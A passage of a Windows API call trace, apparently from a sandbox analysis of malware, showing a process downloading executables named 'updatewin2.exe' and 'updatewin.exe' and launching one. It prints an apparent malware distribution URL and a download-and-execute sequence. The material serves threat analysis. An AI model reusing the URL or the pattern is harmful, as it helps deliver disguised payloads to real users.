lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.335] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.335] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.336] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.336] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.336] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.337] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.337] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.337] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.337] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.404] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.405] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.405] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.406] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.406] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.406] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.406] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.407] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.407] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.408] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.408] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.408] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.446] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.446] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.446] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.447] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.447] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.447] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.447] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.448] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.448] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.448] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.449] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.449] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.497] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.497] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.498] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.498] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.498] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.498] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.499] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.499] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.499] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.500] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.500] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.500] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.537] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.538] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.539] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.540] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.540] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.540] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x1200) returned 1 [0043.541] WriteFile (in: hFile=0x6b8, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x1200, lpOverlapped=0x0) returned 1 [0043.541] CloseHandle (hObject=0x6b8) returned 1 [0043.544] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0043.549] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0043.549] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0043.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b040 | out: hHeap=0x660000) returned 1 [0043.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328d168 | out: hHeap=0x660000) returned 1 [0043.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c70960 | out: hHeap=0x660000) returned 1 [0043.598] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0043.604] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x328b430 [0043.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85e) returned 0x3268798 [0043.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328b430, cbMultiByte=-1, lpWideCharStr=0x3268798, cchWideChar=1071 | out: lpWideCharStr="http://ring1.ug/files/penelop/updatewin.exe") returned 44 [0043.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0043.619] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0043.619] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b430 | out: hHeap=0x660000) returned 1 [0043.624] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0043.624] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82f) returned 0x9c5da58 [0043.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring1.ug/files/penelop/updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x9c5da58, cbMultiByte=2095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring1.ug/files/penelop/updatewin.exe", lpUsedDefaultChar=0x0) returned 44 [0043.624] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0043.624] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0043.625] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0043.625] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring1.ug/files/penelop/updatewin.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0043.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0043.811] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9b6d6d0, lpdwBufferLength=0x9b6d710, lpdwIndex=0x0 | out: lpBuffer=0x9b6d6d0*, lpdwBufferLength=0x9b6d710*=0x4, lpdwIndex=0x0) returned 1 [0043.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x328b430 [0043.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3d8 [0043.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328b430 | out: hHeap=0x660000) returned 1 [0043.811] lstrcpyA (in: lpString1=0x322d430, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" [0043.811] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", pMore="updatewin.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe") returned 1 [0043.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b040 [0043.811] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0043.813] SetFilePointer (in: hFile=0x670, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0043.813] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.849] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.850] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.887] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.888] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.890] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.891] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.928] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.928] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.933] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.934] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.934] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.935] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.972] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.973] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.973] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.973] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.974] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.974] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.974] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.974] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.975] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.975] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, lpdwNumberOfBytesRead=0x9b6d6d8*=0x2800) returned 1 [0043.975] WriteFile (in: hFile=0x670, lpBuffer=0x9b6d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9b6d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9b6d778*, lpNumberOfBytesWritten=0x9b6d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0043.976] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9b6d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9b6d6d8 | out: lpBuffer=0x9b6d778*, 